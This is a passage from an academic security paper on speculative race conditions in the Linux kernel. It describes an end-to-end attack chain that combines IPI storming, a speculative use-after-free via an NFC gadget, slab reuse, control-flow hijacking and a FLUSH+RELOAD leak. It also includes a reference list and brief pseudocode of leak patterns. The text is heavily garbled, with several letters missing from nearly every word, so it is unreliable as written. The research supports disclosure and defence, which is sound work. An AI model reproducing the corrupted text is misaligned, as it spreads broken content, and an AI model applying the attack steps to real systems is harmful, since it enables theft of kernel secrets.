To conclude, we no e ha no all he ulne able synch o-
niza ion p imi i es we analyzed a e equally exploi able. Fo
ins ance, unin e up ible p imi i es (e.g., i q-sa e spinlocks)
a e no amenable o he in e up -d i en echniques we de ail
in he nex sec ion, p e en ing he a acke om s e ching he
ace window. Mo eo e , ou analysis ocuses on he ke nel,
excluding p imi i es ha no mally apply only o use exe-
cu ion (e.g., In el TSX-based p imi i es, also unin e up ible
wi hou abo ing he unde lying memo y ansac ions).
4.3 Exploi ing Specula i e Race Condi ions
To add ess
C3
, we need o moun end- o-end in o ma ion
disclosu e a acks. To his end, a med wi h knowledge o
specula i e ace condi ions (SRCs), we can now bypass syn-
ch oniza ion p imi i es (e.g., mu ex) on a specula i e pa h and
u n sa e a chi ec u al uses in o a specula i e concu en use-
a e - ee (SCUAF). Nex , a med wi h con ol o e memo y
euse, we can escala e ou SCUAF p imi i e o i s specula-
i e con ol- low hijacking and hen specula i e in o ma ion
disclosu e o some a ge ke nel da a. Finally, a med wi h an
unbounded UAF window, we can epea edly e ec ou p im-
i i es, disclose a bi a y ke nel da a, and moun end- o-end
a acks leaking some a ge sec e in ke nel memo y. Figu e 8
de ails he s eps o an a ack based on ou NFC gadge .
Ini ializa ion. To kicks a he a ack,
1
he a acke s a s
execu ing on a gi en (a acke ) co e and igge s he alloca ion
o
hde
and
hde ->cmd_pending_msg
. Nex ,
2
he a acke
mis ains he ic im mu ex’s condi ional b anch by execu ing
he gadge and acqui ing he mu ex a chi ec u ally many imes.
Nex ,
3
he a acke s a s he ic im h ead and he s o ming
h eads on he co esponding co es.
USENIX Associa ion 33 d USENIX Secu i y Symposium 6191
Figu e 8: Specula i e in o ma ion disclosu e a ack exploi ing a specula i e ace condi ion. S eps 1-4 and 8-10 un in use mode,
issuing syscalls o igge he ele an ke nel code. The o he s eps un in ke nel mode. The
n c_hci_msg_ x_wo k
gadge code
is shown only o explain how he specula i e ace condi ion is c ea ed.
Unbounded UAF Window. To c ea e an unbounded UAF
window,
4
he a acke schedules a high-p ecision ime
on he ic im co e. Nex ,
5
he a acke causes he ic-
im h ead o igge he execu ion o he NFC gadge , a -
chi ec u ally locking he mu ex and en e ing he gua ded
c i ical egion. Nex ,
6
he NFC gadge calls
k ee
on he
hde ->cmd_pending_msg
poin e . Nex ,
7
he
high-p ecision ime expi es, in e up ing he ic im h ead
when he
hde ->cmd_pending_msg
poin e is s ill dangling.
Sho ly a e , he a acke signals he s o ming h eads o a ge
he ic im co e wi h a s o m o
MEMBARRIER
IPIs, p e en -
ing he ic im h ead o esume execu ion un il he a acke
signals again he s o ming h eads o e mina e.
Specula i e Con ol-Flow Hijacking.
8
Fo each ke -
nel add ess o leak in o de o disclose he a ge sec e ,
he a acke i s c a s a specula i e con ol- low hijacking
(SCFH) p imi i e. To his end, he a acke needs o allo-
ca e a con olled objec eusing he memo y slo
k ee
d
ea lie ia slab massaging. Wi h SLUB (de aul slab imple-
men a ion), he a acke can exploi same-CPU, same-size-
class slab cache collision echniques [48] o achie e mem-
o y euse. Speci ically,
9
he a acke i s c ea es a mali-
cious
s uc msgbu
message, cas s i o
s uc hci_msg
,
and se s: (i) he
hci_msg.cb
callback o he specula i e
SCFH a ge , (ii) he
hci_msg.cb_con ex
i s callback
a gumen o he SCFH a gumen . Nex ,
10
he a acke calls
he
msgsnd
sys em call wi h he malicious
msgbu
message,
which ul ima ely ge s alloca ed in he same slo as he eed
hde ->cmd_pending_msg
. Nex ,
11
he a acke igge s
he execu ion o he gadge . Due o he mis ained b anch, he
CPU specula i ely en e s he c i ical egion despi e he mu ex
being a chi ec u ally held by he ic im h ead. Nex ,
12
he
gadge specula i ely de e e ences he dangling poin e , hijack-
ing con ol low o he a acke -con olled callback a ge .
Specula i e In o ma ion Disclosu e. To c a a specula i e
in o ma ion disclosu e p imi i e, he a acke needs o i s
b eak KALSR using exis ing echniques [2]. Nex , he a acke
needs o igge he SCFH p imi i e wi h he callback a ge
se o a ke nel disclosu e gadge using he con olled i s
callback a gumen (
di
) as inpu . Fo his pu pose, we use
he
p_del_ qs
Spec e gadge in Figu e 9, also exploi ed
in olde ke nel e sions in p io wo k [27]. As shown in he
igu e, he con olled memo y e e enced by
di
is e e enced
by he gadge o compu e he sec e add ess ( 12+0x28) and
he base add ess o an a ay (
ax
)—which we can use as he
eload bu e o a classic FLUSH+RELOAD Spec e co e
channel [45]. The gadge eads he sec e in he
dx
egis e ,
hen used o index he eload bu e wi h s ide
8
a line 22. To
handle he small s ide and he high sec e en opy, we can use
sliding echniques, as done in p io wo k [27,73]. Ul ima ely,
6192 33 d USENIX Secu i y Symposium USENIX Associa ion
like Spec e- 1. The Linux ke nel de elope s ha e no im-
media e plans o implemen se ializa ion o synch oniza ion
p imi i es due o pe o mance conce ns. Howe e , hey con-
i med he IPI s o ming issue (CVE-2024-26602 [3]) and
implemen ed an IPI a e limi ing ea u e o add ess he CPU
sa u a ion issue by adding a synch oniza ion mu ex on he
pa h o
sys_memba ie
and a oiding i s concu en execu-
ion on mul iple co es [4]. Un o una ely, as ou expe imen s
show (Figu e 5), hinde ing IPI s o ming p imi i es (i.e., 0
s o ming co es) is insu icien o comple ely close he a ack
su ace.
Acknowledgmen s
We would like o hank he anonymous e iewe s o hei
eedback, And ew Coope o his ea ly commen s on he pa-
pe , Julia Lawall o he Coccinelle cla i ica ions, and Alessan-
d o So nio i o he ea ly discussions abou he p ojec . This
wo k was pa ially suppo ed by In el Co po a ion h ough
he “Allocamelus” p ojec , by he Du ch Resea ch Council
(NWO) h ough p ojec “INTERSECT”, and by he Eu opean
Union’s Ho izon Eu ope p og am unde g an ag eemen No.
101120962 (“Rescale”).
Re e ences
[1]
Ghos Race - CVE-2024-2193.
h ps://www.c e.
o g/CVEReco d?id=CVE-2024-2193.
[2]
Ke nel add ess space layou de andomiza ion (kasld).
h ps://gi hub.com/bcoles/kasld.
[3]
Memba ie IPI S o ming - CVE-2024-
26602.
h ps://lo e.ke nel.o g/lkml/
2024022614-unhappily-py hon-2cd0@g egkh/.
[4]
sched/memba ie : educe he abili y o
hamme on sys_memba ie .
h ps://
gi .ke nel.o g/pub/scm/linux/ke nel/
gi / o alds/linux.gi /commi /?id=
944d5 e50 3 03daac ea16300e656a1691c4a23.
[5] Cwe-416: Use a e ee, 2006.
[6]
Analysis and exploi a ion o pegasus ke nel ulne abili-
ies (c e-2016-4655 / c e-2016-4656), 2016.
[7]
Mac os x p i ilege escala ion ia use-a e - ee: C e-
2016-1828, 2016.
[8]
In el esea ch on disclosu e gadge s a indi ec b anch
a ge s in he linux* ke nel, 2022.
[9]
Jia-Ju Bai, Julia Lawall, Qiu-Liang Chen, and Shi-Min
Hu. E ec i e s a ic analysis o concu ency use-a e -
ee bugs in linux de ice d i e s. In USENIX ATC, 2019.
[10]
En ico Ba be is, Pie o F igo, Ma ius Muench, He be
Bos, and C is iano Giu ida. B anch his o y injec ion:
On he e ec i eness o ha dwa e mi iga ions agains
c oss-p i ilege Spec e- 2 a acks. In USENIX Secu i y,
2022.
[11]
Adam Belay, And ea Bi au, Ali Mash izadeh, Da id
Te ei, Da id Maziè es, and Ch is os Kozy akis. Dune:
Sa e use -le el access o p i ileged
{
CPU
}
ea u es. In
OSDI, 2012.
[12]
A i Bha acha yya, Alexand a Sandulescu, Ma hias
Neugschwand ne , Alessand o So nio i, Babak Falsa i,
Ma hias Paye , and Anil Ku mus. SMoThe Spec e:
exploi ing specula i e execu ion h ough po con en ion.
In CCS, 2019.
[13]
Ma cel Böhme, Van-Thuan Pham, Manh-Dung Nguyen,
and Abhik Roychoudhu y. Di ec ed g eybox uzzing.
In CCS, 2017.
[14]
Juan Caballe o, Gus a o G ieco, Ma k Ma on, and An-
onio Nappa. Undangle: Ea ly de ec ion o dangling
poin e s in use-a e - ee and double- ee ulne abili ies.
In ISSTA, 2012.
[15] Yan Cai, Biyun Zhu, Ruijie Meng, Hao Yun, Liang He,
Pu ui Su, and Bin Liang. De ec ing concu ency mem-
o y co up ion ulne abili ies. In ESEC/FSE, 2019.
[16] Dan Ca pen e . Sma ch check o Spec e s u , 2018.
[17]
Hongxu Chen, Shengjian Guo, Yinxing Xue, Yulei Sui,
Cen Zhang, Yuekang Li, Haijun Wang, and Yang Liu.
MUZZ: Th ead-awa e g ey-box uzzing o e ec i e
bug hun ing in mul i h eaded p og ams. In USENIX
Secu i y, 2020.
[18]
Hongxu Chen, Yinxing Xue, Yuekang Li, Bihuan Chen,
Xiao ei Xie, Xiuheng Wu, and Yang Liu. Hawkeye:
Towa ds a desi ed di ec ed g ey-box uzze . In CCS,
2018.
[19] Nick Cli on. Spec e a ian 1 scanning ool, 2018.
[20]
Sco Cons able, Jo Van Bulck, Xiang Cheng, Yuan Xiao,
Ced ic Xing, Ilya Alexand o ich, Taesoo Kim, F ank
Piessens, Mona Vij, and Ma k Silbe s ein. AEX-No i y:
Thwa ing p ecise single-s epping a acks h ough in-
e up awa eness o In el SGX encla es. In USENIX
Secu i y, 2023.
[21]
C aig Disselkoen, Da id Kohlb enne , Leo Po e , and
Dean Tullsen. P ime+Abo : A ime - ee high-
p ecision L3 cache a ack using In el TSX. In USENIX
Secu i y, 2017.
USENIX Associa ion 33 d USENIX Secu i y Symposium 6199
[22]
Zhengjie Du, Yuekang Li, Yang Liu, and Bing Mao.
Wind ange : A di ec ed g eybox uzze d i en by de ia-
ion basic blocks. In ICSE, 2022.
[23]
Ali eza Fa shin, Ami Roozbeh, Ge ald Q Magui e J ,
and Dejan Kos i´
c. Make he mos ou o las le el cache
in in el p ocesso s. In Eu oSys, 2019.
[24]
Josué Feliu, Albe o Ros, Manuel E Acacio, and S e-
anos Kaxi as. I sl : In e - h ead s o e- o-load o -
wa dingin simul aneous mul i h eading. In MICRO,
2021.
[25]
Josué Feliu, Albe o Ros, Manuel E Acacio, and S e-
anos Kaxi as. Specula i e in e - h ead s o e- o-load
o wa ding in sm a chi ec u es. Jou nal o Pa allel and
Dis ibu ed Compu ing, 173:94–106, 2023.
[26]
Thomas Gleixne and Douglas Niehaus. H ime s and
beyond: T ans o ming he linux ime subsys ems. In
P oceedings o he Linux symposium, olume 1, pages
333–346. Ci esee , 2006.
[27]
Enes Gok as, Ka eh Raza i, Geo gios Po okalidis, He -
be Bos, and C is iano Giu ida. Specula i e P obing:
Hacking Blind in he Spec e E a. In CCS, 2020.
[28]
Sishuai Gong, Deniz Al inbüken, Ped o Fonseca, and
Pe os Mania is. Snowboa d: Finding ke nel concu -
ency bugs h ough sys ema ic in e - h ead communica-
ion analysis. In SOSP, 2021.
[29]
Daniel G uss, Clémen ine Mau ice, Klaus Wagne , and
S e an Manga d. Flush+ lush: A as and s eal hy cache
a ack. In DIMVA, 2016.
[30]
Ma co Gua nie i, Bo is Köp , José F Mo ales, Jan
Reineke, and And és Sánchez. Spec ec o : P incipled
de ec ion o specula i e in o ma ion lows. In S&P,
2020.
[31]
Ma hé He ogh, Sande Wiebing, and C is iano Giu -
ida. Leaky add ess masking: Exploi ing unmasked
Spec e gadge s wi h noncanonical add ess ansla ion.
In S&P, 2024.
[32]
Ma hé He ogh, Manuel Wiesinge , Sebas ian Ös e lund,
Ma ius Muench, Nada Ami , He be Bos, and C is-
iano Giu ida. Qua an ine: Mi iga ing ansien execu-
ion a acks wi h physical domain isola ion. In RAID,
2023.
[33]
Jann Ho n. specula i e execu ion, a ian 4: specula i e
s o e bypass, 2018.
[34]
Jann Ho n. Exploi ing ace condi ions on [ancien ]
Linux. In LSSEU, 2019.
[35]
Heqing Huang, Yiyuan Guo, Qingkai Shi, Peisen Yao,
Rongxin Wu, and Cha les Zhang. BEACON: Di ec ed
g ey-box uzzing wi h p o able pa h p uning. In S&P,
2022.
[36]
Je Huang. U o: P edic i e concu ency use-a e - ee
de ec ion. In ICSE, 2018.
[37]
Open Sou ce Secu i y Inc. Respec e: The s a e o he
a in Spec e de enses, 2018.
[38]
Dae Jeong, Kyung ae Kim, Basa esh Shi akuma , By-
oungyoung Lee, and Insik Shin. Razze : Finding ke nel
ace bugs h ough uzzing. In S&P, 2019.
[39]
Dae R Jeong, Byoungyoung Lee, Insik Shin, and
Youngjin Kwon. Seg uzz: Segmen izing h ead in e -
lea ing o disco e ke nel concu ency bugs h ough
uzzing. In S&P, 2023.
[40]
Zu-Ming Jiang, Jia-Ju Bai, Kangjie Lu, and Shi-Min Hu.
Con ex -sensi i e and di ec ional concu ency uzzing
o da a- ace de ec ion. In NDSS, 2022.
[41]
B ian Johannesmeye , Jakob Koschel, Ka eh Raza i,
He be Bos, and C is iano Giu ida. Kaspe : Scan-
ning o Gene alized T ansien Execu ion Gadge s in
he Linux Ke nel. In NDSS, Ap il 2022.
[42]
Vladimi Ki iansky and Ca l Waldspu ge . Spec-
ula i e bu e o e lows: A acks and de enses.
a Xi :1807.03757.
[43]
O ek Ki zne and Adam Mo ison. An analysis o spec-
ula i e ype con usion ulne abili ies in he wild. a Xi
p ep in a Xi :2106.15601, 2021.
[44]
Youngjoo Ko, Bin Zhu, and Jong Kim. Fuzzing wi h
au oma ically con olled in e lea ings o de ec con-
cu ency bugs. Jou nal o Sys ems and So wa e,
191:111379, 2022.
[45]
Paul Koche , Jann Ho n, Ande s Fogh, Daniel Genkin,
Daniel G uss, We ne Haas, Mike Hambu g, Mo i z
Lipp, S e an Manga d, Thomas P esche , Michael
Schwa z, and Yu al Ya om. Spec e A acks: Exploi ing
Specula i e Execu ion. In S&P, 2019.
[46]
Byoungyoung Lee, Chengyu Song, Yeongjin Jang,
Tielei Wang, Taesoo Kim, Long Lu, and Wenke Lee.
P e en ing use-a e - ee wi h dangling poin e s nulli i-
ca ion. In NDSS, 2015.
[47]
Gwangmu Lee, Woochul Shim, and Byoungyoung Lee.
Cons ain -guided di ec ed g eybox uzzing. In USENIX
Secu i y, 2021.
6200 33 d USENIX Secu i y Symposium USENIX Associa ion
[48]
Yoochan Lee, Jinhan Kwak, Junesoo Kang, Yuseok Jeon,
and Byoungyoung Lee. Psp ay: Timing
{
Side-Channel
}
based linux ke nel heap exploi a ion echnique. In
USENIX Secu i y, 2023.
[49]
Yoochan Lee, Changwoo Min, and Byoungyoung Lee.
ExpRace: Exploi ing ke nel aces h ough aising in e -
up s. In USENIX Secu i y, 2021.
[50]
Mo i z Lipp, Michael Schwa z, Daniel G uss, Thomas
P esche , We ne Haas, Ande s Fogh, Jann Ho n, S e an
Manga d, Paul Koche , Daniel Genkin, Yu al Ya om,
and Mike Hambu g. Mel down: Reading Ke nel Mem-
o y om Use Space. In USENIX Secu i y, 2018.
[51]
Changming Liu, Deqing Zou, Peng Luo, Bin B. Zhu, and
Hai Jin. A heu is ic amewo k o de ec concu ency
ulne abili ies. In ACSAC, 2018.
[52]
And ea Mamb e i, Alexand a Sandulescu, Ma hias
Neugschwand ne , Alessand o So nio i, and Anil Ku -
mus. Two me hods o exploi ing specula i e con ol
low hijacks. In USENIX WOOT 19.
[53]
And ea Mamb e i, Alexand a Sandulescu, Alessan-
d o So nio i, William Robe son, Engin Ki da, and
Anil Ku mus. Bypassing memo y sa e y mechanisms
h ough specula i e con ol low hijacks. In IEEE Eu-
oS&P, 2021.
[54]
La y W McVoy, Ca l S aelin, e al. lmbench: Po able
ools o pe o mance analysis. In USENIX ATC, 1996.
[55]
Manh-Dung Nguyen, Sébas ien Ba din, Richa d Boni-
chon, Roland G oz, and Ma hieu Leme e. Bina y-le el
di ec ed uzzing o use-a e - ee ulne abili ies, 2020.
[56]
Oleksii Oleksenko, Bohdan T ach, Ma k Silbe s ein, and
Ch is o Fe ze . SpecFuzz: B inging Spec e- ype ul-
ne abili ies o he su ace. In USENIX Secu i y, 2020.
[57]
Ricca do Paccagnella, Licheng Luo, and Ch is ophe W
Fle che . Lo d o he ing (s): Side channel a acks on
he cpu on-chip ing in e connec a e p ac ical. a Xi
p ep in a Xi :2103.03443, 2021.
[58]
Yoann Padioleau, René Rydho Hansen, Julia L. Lawall,
and Gilles Mulle . Seman ic pa ches o documen ing
and au oma ing colla e al e olu ions in linux de ice
d i e s. In PLOS, 2006.
[59]
Yoann Padioleau, Julia L. Lawall, and Gilles Mulle . Se-
man ic pa ches, documen ing and au oma ing colla e al
e olu ions in Linux de ice d i e s. In OLS, 2007.
[60]
Zhenxiao Qi, Qian Feng, Yueqiang Cheng, Mengjia Yan,
Peng Li, Heng Yin, and Tao Wei. SpecTain : Specula i e
ain analysis o disco e ing Spec e gadge s. 2021.
[61]
Hany Ragab, En ico Ba be is, He be Bos, and C is-
iano Giu ida. Rage Agains he Machine Clea : A
Sys ema ic Analysis o Machine Clea s and Thei Im-
plica ions o T ansien Execu ion A acks. In USENIX
Secu i y, 2021.
[62]
Koushik Sen. Race di ec ed andom es ing o concu -
en p og ams. In PLDI, 2008.
[63]
Yousse Tobah, And ew Kwong, Ingab Kang, Daniel
Genkin, and Kang G Shin. SpecHamme : Combining
Spec e and Rowhamme o new specula i e a acks. In
S&P, 2022.
[64]
Daniël T ujillo, Johannes Wikne , and Ka eh Raza i.
Incep ion: exposing new a ack su aces wi h aining in
ansien execu ion. In USENIX Secu i y, 2023.
[65]
Jo Van Bulck, F ank Piessens, and Raoul S ackx. Sgx-
s ep: A p ac ical a ack amewo k o p ecise encla e
execu ion con ol. In SysTEX, 2017.
[66]
S ephan an Schaik, Alyssa Milbu n, Sebas ian Ös e -
lund, Pie o F igo, Gio gi Maisu adze, Ka eh Raza i,
He be Bos, and C is iano Giu ida. RIDL: Rogue
in- ligh da a load. In S&P, 2019.
[67]
Nischai Vinesh and M. Se humadha an. Con uzz—
a concu ency uzze . In Ashish Kuma Luhach,
Janos A pad Kosa, Ramesh Chand a Poonia, Xiao-Zhi
Gao, and Dha m Singh, edi o s, ICTSCI, 2020.
[68]
Guanhua Wang, Sudip a Cha opadhyay, A nab Ku-
ma Biswas, Tulika Mi a, and Abhik Roychoudhu y.
KleeSpec e: De ec ing in o ma ion leakage h ough
specula i e cache a acks ia symbolic execu ion.
TOSEM, 29(3), 2020.
[69]
Guanhua Wang, Sudip a Cha opadhyay, I an Go o -
chi s, Tulika Mi a, and Abhik Roychoudhu y. oo7: Low-
o e head de ense agains Spec e a acks ia p og am
analysis. IEEE TSE, PP:1–1, 11 2019.
[70]
Haijun Wang, Xiao ei Xie, Yi Li, Cheng Wen, Yuekang
Li, Yang Liu, Shengchao Qin, Hongxu Chen, and Yulei
Sui. Types a e-guided uzze o disco e ing use-a e -
ee ulne abili ies. In ICSE, 2020.
[71]
Nico Weichb od , Anil Ku mus, Pe e Pie zuch, and
Rüdige Kapi za. Asyncshock: Exploi ing synch onisa-
ion bugs in in el sgx encla es. In ESORICS, 2016.
[72]
Sande Wiebing, Al ise de Fa e i T on, He be Bos,
and C is iano Giu ida. InSpec e Gadge : Inspec ing
he esidual a ack su ace o c oss-p i ilege Spec e 2.
In USENIX Secu i y, 2024.
USENIX Associa ion 33 d USENIX Secu i y Symposium 6201
[73]
Johannes Wikne and Ka eh Raza i. RETBLEED: A bi-
a y specula i e code execu ion wi h e u n ins uc ions.
In USENIX Secu i y, 2022.
[74]
Meng Xu, Sanidhya Kashyap, Hanqing Zhao, and Tae-
soo Kim. K ace: Da a ace uzzing o ke nel ile sys-
ems. In S&P, 2020.
[75]
Hua Yan, Yulei Sui, Shiping Chen, and Jingling Xue.
Spa io- empo al con ex educ ion: A poin e -analysis-
based s a ic app oach o de ec ing use-a e - ee ulne -
abili ies. In ICSE, 2018.
[76]
Yu al Ya om and Naomi Benge . Reco e ing OpenSSL
ECDSA Nonces Using he FLUSH+RELOAD Cache
Side-channel A ack. IACR C yp ology eP in A chi e,
2014.
[77]
Yu al Ya om and Ka ina Falkne . FLUSH+RELOAD:
A High Resolu ion, Low Noise, L3 Cache Side-channel
A ack. In USENIX Secu i y, 2014.
[78]
Jiayi Ye, Chao Zhang, and Xinhui Han. Pos e :
Ua checke : Scalable s a ic de ec ion o use-a e - ee
ulne abili ies. In CCS, 2014.
[79]
Wei You, Peiyuan Zong, Kai Chen, XiaoFeng Wang,
Xiaojing Liao, Pan Bian, and Bin Liang. Sem uzz:
Seman ics-based au oma ic gene a ion o p oo -o -
concep exploi s. In CCS, 2017.
[80]
Ming Yuan, Bodong Zhao, Penghui Li, Jiashuo Liang,
Xinhui Han, Xiapu Luo, and Chao Zhang. Dd ace: Find-
ing concu ency ua ulne abili ies in linux d i e s wi h
di ec ed uzzing.
[81]
Google P ojec Ze o. Racing agains he clock – hi ing
a iny ke nel ace window, 2023.
[82]
Peiyuan Zong, Tao L , Dawei Wang, Zizhuang Deng,
Ruigang Liang, and Kai Chen. FuzzGua d: Fil e ing ou
un eachable inpu s in di ec ed g ey-box uzzing h ough
deep lea ning. In USENIX Secu i y, 2020.
A Addi ional SRC Code Pa e ns
We discuss SRC code pa e ns o he han SCUAFs ha a e
po en ially exploi able. In p inciple, any da a ace pa e n ha
may lead o a memo y e o could be ulne able, bu hey
mus also exhibi a Spec e-like ansmi e pa e n as shown
in he examples below.
A da a ace may lead o example o an ou -o -bounds ac-
cess. We show in Lis ing 1 a code pa e n whe e Th ead 1,
which is he a chi ec u ally execu ing h ead, pe o ms an up-
da e on a sha ed index a iable. We can also assume ha he
o se alue can be a acke -con olled. Such a pa e n could
occu o example when using a ci cula bu e . The an-
sien ly execu ed h ead pe o ms a specula i e w i e, which
can be ou -o -bounds. Assuming ha a ay elemen s a e he
same size as poin e s, his scena io would lead o he abili y
o con ol he unc ion poin e . No e ha a specula i e con ol
low hijack is no necessa y, and any known Spec e ansmi -
e pa e n could also su ice, as shown in Lis ing 2. This case
immedia ely leads o an a bi a y ead p imi i e, wi hou he
need o addi ional gadge s.
Lis ing 1: OOB access SRC
//Th ead 1 (a chi ec u al, in e up ed):
mu ex_lock (&m);
sha ed_idx += o se ; // in e up he e
i (sha ed_idx >ARRAY_SIZE)
sha ed_idx =0;
mu ex_unlock (&m);
//Th ead 2 ( ansien ):
mu ex_lock (&m);
// spec. OOB w i e
a ay[sha ed_idx] = al;
// con ol low hijack
p ();
mu ex_unlock (&m);
Lis ing 2: O he ansmi e
//Th ead 2 ( ansien ):
mu ex_lock (&m);
// access sec e
by e =a ay[sha ed_idx];
// ansmi
al =p obe_a ay[4096*by e];
mu ex_unlock (&m);
O he pa e ns a e highly likely o exis . We expec u u e
wo k o u he s udy hei p e alence and exploi abili y.
6202 33 d USENIX Secu i y Symposium USENIX Associa ion
